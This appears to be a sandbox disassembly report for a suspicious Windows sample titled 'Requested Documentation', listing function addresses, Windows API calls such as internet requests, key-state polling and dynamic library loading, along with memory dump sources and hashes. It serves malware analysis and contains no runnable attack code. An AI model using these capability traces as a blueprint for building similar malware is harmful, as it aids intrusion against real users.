                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
                                                                              • Instruction ID: c240869e242f9da8a114ff4ea261295b7f0ef419ce6458030d6b313a135896bd
                                                                              • Opcode Fuzzy Hash: 3cfd0ffa12c77debba549ff38d164145a64f39ddcb4c2bc8af85fd726d057a92
                                                                              • Instruction Fuzzy Hash: 8A417C702083819FD726DF26C844B1ABBECAF85314F144A6DF9A5972D2D730ED05CB52
                                                                              Function 009FD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FD7C5
                                                                                • Part of subcall function 0098784B: _memmove.LIBCMT ref: 00987899
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower_memmove
                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                              • API String ID: 3425801089-567219261
                                                                              • Opcode ID: fb0d623fb39ca6d4ee291c1ec2331729afec02494bed2fe2da5125152a798023
                                                                              • Instruction ID: c73b3e5d25b31936aaf263e96b28a03f91025524edca8e3b79c3a6b461f5fc70
                                                                              • Opcode Fuzzy Hash: fb0d623fb39ca6d4ee291c1ec2331729afec02494bed2fe2da5125152a798023
                                                                              • Instruction Fuzzy Hash: FD319C71904619ABCF00EF94C851ABEB7B9FF85324F108A29E825A77D1DB71AD05CB80
                                                                              Function 009D8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009D8F14
                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009D8F27
                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 009D8F57
                                                                                • Part of subcall function 00987BCC: _memmove.LIBCMT ref: 00987C06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 365058703-1403004172
                                                                              • Opcode ID: 2e8673ff6da227801f2627bcd5b472a495ca0933d801c30ce61ad02b0f8a6855
                                                                              • Instruction ID: ddc375024500c0c25cc6de69dccd7f1233cff16963e821fda0bfbf02a0051c8d
                                                                              • Opcode Fuzzy Hash: 2e8673ff6da227801f2627bcd5b472a495ca0933d801c30ce61ad02b0f8a6855
                                                                              • Instruction Fuzzy Hash: 7C21F275A40108BEDB24ABB48C45EFFB779DF85320F50861AF421A73E2DB39480A9650
                                                                              Function 009F182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009F184C
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009F1872
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009F18A2
                                                                              • InternetCloseHandle.WININET(00000000), ref: 009F18E9
                                                                                • Part of subcall function 009F2483: GetLastError.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F2498
                                                                                • Part of subcall function 009F2483: SetEvent.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F24AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 3113390036-3916222277
                                                                              • Opcode ID: fc5ac0c1a8ba98fa6a5e95347320a59608e98ea6da0c131d2e1ea7b9d44b611a
                                                                              • Instruction ID: c85c9df2790bfaa4c4d43b59008ceccf86403a1caf3d09448c5f5f5d37a969a2
                                                                              • Opcode Fuzzy Hash: fc5ac0c1a8ba98fa6a5e95347320a59608e98ea6da0c131d2e1ea7b9d44b611a
                                                                              • Instruction Fuzzy Hash: EA2180B150020CBFEB119BA4DD85FBB77EDEB88784F10412AF605A6240DA649D0657A1
                                                                              Function 00A063E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
                                                                                • Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
                                                                                • Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A06461
                                                                              • LoadLibraryW.KERNEL32(?), ref: 00A06468
                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A0647D
                                                                              • DestroyWindow.USER32(?), ref: 00A06485
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 4146253029-1011021900
                                                                              • Opcode ID: e836427516977e0c8307c067838f545e6a7fbfe3622f2a46ac5825641d85aceb
                                                                              • Instruction ID: c8b4dad7cf2b617c3b076785e90f45bcc620bb007b35431bfe3fa9c3377eeaa4
                                                                              • Opcode Fuzzy Hash: e836427516977e0c8307c067838f545e6a7fbfe3622f2a46ac5825641d85aceb
                                                                              • Instruction Fuzzy Hash: 99215E71500209BFEF108FA4ED40EBB77ADEF59368F148629F920961D0D7729C629760
                                                                              Function 009E6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 009E6DBC
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E6DEF
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 009E6E01
                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009E6E3B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: 9617ad63d5322bf2e766b64536035cc237f247aadf50c69c420470758e51ffc5
                                                                              • Instruction ID: 4bf494a4b2076df911ebfbc0c66df93e5fc7ddd7035962139e027aae980585d2
                                                                              • Opcode Fuzzy Hash: 9617ad63d5322bf2e766b64536035cc237f247aadf50c69c420470758e51ffc5
                                                                              • Instruction Fuzzy Hash: FA21A174600249ABDB219F6ADC05B9A7BB8EFA4760F204A19FDA0D72D0D7709C518B50
                                                                              Function 009E6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 009E6E89
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009E6EBB
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 009E6ECC
                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009E6F06
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: 6f30856b085fefc4ed11f3b9cbb992445895e519084bd78176e1fc19afb5190e
                                                                              • Instruction ID: 09580661c12325a274a7b568bf0991a2b815b02eef6b405a066b015fa8ca7fbf
                                                                              • Opcode Fuzzy Hash: 6f30856b085fefc4ed11f3b9cbb992445895e519084bd78176e1fc19afb5190e
                                                                              • Instruction Fuzzy Hash: F621B0795003459BDB219F6ACC04AAA77A8AF657A0F200A5DF9E0E32D0D770AC618B10
                                                                              Function 009EAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 009EAC54
                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009EACA8
                                                                              • __swprintf.LIBCMT ref: 009EACC1
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A0F910), ref: 009EACFF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu
                                                                              • API String ID: 3164766367-685833217
                                                                              • Opcode ID: db178a3207cc94c3aca21131b9ace61da6d2109adc9f5462e082b0db489066d0
                                                                              • Instruction ID: be15e1e7575cc4b8ba341c0373dbb495d5a068359c21d3e922596e1f35355941
                                                                              • Opcode Fuzzy Hash: db178a3207cc94c3aca21131b9ace61da6d2109adc9f5462e082b0db489066d0
                                                                              • Instruction Fuzzy Hash: C7219030A00109AFCB10EF65C945EAE7BB8FF89314B004469F909AB351DA31EA41CB61
                                                                              Function 009E1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?), ref: 009E1B19
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper
                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                              • API String ID: 3964851224-769500911
                                                                              • Opcode ID: d00b002e45c459ac9d9f2dca1d203333bd89b39ba2443d9092cc3804f83dcf41
                                                                              • Instruction ID: b21fd671cd0877a32b44e9d2bd4bf36fe72a1009e0431fdabd5d2bfa53db61d9
                                                                              • Opcode Fuzzy Hash: d00b002e45c459ac9d9f2dca1d203333bd89b39ba2443d9092cc3804f83dcf41
                                                                              • Instruction Fuzzy Hash: 6B1184319002588FCF00EF94D8559FEB7B4FFA6708F584465E815A7696EB329D06CB50
                                                                              Function 009FEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009FEC07
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009FEC37
                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009FED6A
                                                                              • CloseHandle.KERNEL32(?), ref: 009FEDEB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                              • String ID:
                                                                              • API String ID: 2364364464-0
                                                                              • Opcode ID: 47f0202fb47e1ddcae1fb27c4a8430e3771e282e0b1c76232cbd5d8518bf4f09
                                                                              • Instruction ID: 8bed5c5f6bc41f86863370c1649b69958d2698a041c5a35fcfb73a1477b6d01c
                                                                              • Opcode Fuzzy Hash: 47f0202fb47e1ddcae1fb27c4a8430e3771e282e0b1c76232cbd5d8518bf4f09
                                                                              • Instruction Fuzzy Hash: F28150716003019FD760EF28C886F2AB7E5AF88714F54881DFA9A9B3D2DA70AC41CB51
                                                                              Function 00A00037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 00A00E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009FFDAD,?,?), ref: 00A00E31
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A000FD
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0013C
                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A00183
                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00A001AF
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00A001BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                              • String ID:
                                                                              • API String ID: 3440857362-0
                                                                              • Opcode ID: 16ef868a96004ef378f2447dad4faebe033977d9fab40a8f350f53923f33dcd4
                                                                              • Instruction ID: 3c2e52d1c6ad9c389223b63e91d09be456d2508fe7e859f368a398b5aa00c6b9
                                                                              • Opcode Fuzzy Hash: 16ef868a96004ef378f2447dad4faebe033977d9fab40a8f350f53923f33dcd4
                                                                              • Instruction Fuzzy Hash: 12519D71208208AFC714EF68DC81F6AB7E8FF84314F44892DF595972A2DB31E905CB52
                                                                              Function 009FD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FD927
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 009FD9AA
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 009FD9C6
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 009FDA07
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 009FDA21
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,009E7896,?,?,00000000), ref: 00985A2C
                                                                                • Part of subcall function 00985A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,009E7896,?,?,00000000,?,?), ref: 00985A50
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 327935632-0
                                                                              • Opcode ID: 202cb3d7f9ab519b6a0316ecb9544ce98a9167141e58526f252a8b73ebfe4be7
                                                                              • Instruction ID: 525c9a81259cbd4aaa4ffaff34fe1e204296f2f9fb35949ac227d3cea2815ff6
                                                                              • Opcode Fuzzy Hash: 202cb3d7f9ab519b6a0316ecb9544ce98a9167141e58526f252a8b73ebfe4be7
                                                                              • Instruction Fuzzy Hash: B1514935A01209DFCB00EFA8C484AADB7F9FF49324B15816AE955AB312D731ED46CF91
                                                                              Function 009EE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009EE61F
                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009EE648
                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009EE687
                                                                                • Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
                                                                                • Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC
                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009EE6AC
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009EE6B4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1389676194-0
                                                                              • Opcode ID: 2a854fed5e54afee956925fbdfb2e10c7081c82b54fc70ed587d5932142f365a
                                                                              • Instruction ID: aaaaff77f84c7f01e7d5552137f661cf08057d9f4fb0f7b2361be85e6c9e3dd5
                                                                              • Opcode Fuzzy Hash: 2a854fed5e54afee956925fbdfb2e10c7081c82b54fc70ed587d5932142f365a
                                                                              • Instruction Fuzzy Hash: 6351FB35A00205DFCB11EF65C985AAEBBF5EF49314F1480A9E819AB361DB31ED11DF50
                                                                              Function 00A0A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f5146fd71e5e492257d36b1cb1dd747e580dfbd827647fb9860c36810d79baf8
                                                                              • Instruction ID: 6a2c1571c925af613a66451e22a9bbe1a69c4d981991ae40ea6a27923592d1dd
                                                                              • Opcode Fuzzy Hash: f5146fd71e5e492257d36b1cb1dd747e580dfbd827647fb9860c36810d79baf8
                                                                              • Instruction Fuzzy Hash: 1F41A535A0431CAFD720DF78EC48FA9BBB4EB29310F154265F916A72E1C770AD42DA51
                                                                              Function 00982344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00982357
                                                                              • ScreenToClient.USER32(00A457B0,?), ref: 00982374
                                                                              • GetAsyncKeyState.USER32(00000001), ref: 00982399
                                                                              • GetAsyncKeyState.USER32(00000002), ref: 009823A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                              • String ID:
                                                                              • API String ID: 4210589936-0
                                                                              • Opcode ID: 4d58231b8a3ab56ea64c377db66de631eed83474d52e36203b9dc0a3314b3914
                                                                              • Instruction ID: 915458f2b5ab6f1b1f27e06cfe1cce4e28a58cc6342a54286566f8dae1fefd2b
                                                                              • Opcode Fuzzy Hash: 4d58231b8a3ab56ea64c377db66de631eed83474d52e36203b9dc0a3314b3914
                                                                              • Instruction Fuzzy Hash: 37417175604109FFCF25AF68CD44AE9BB79FB05764F20431AF829A6290C734A950DB91
                                                                              Function 009D63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009D63E7
                                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 009D6433
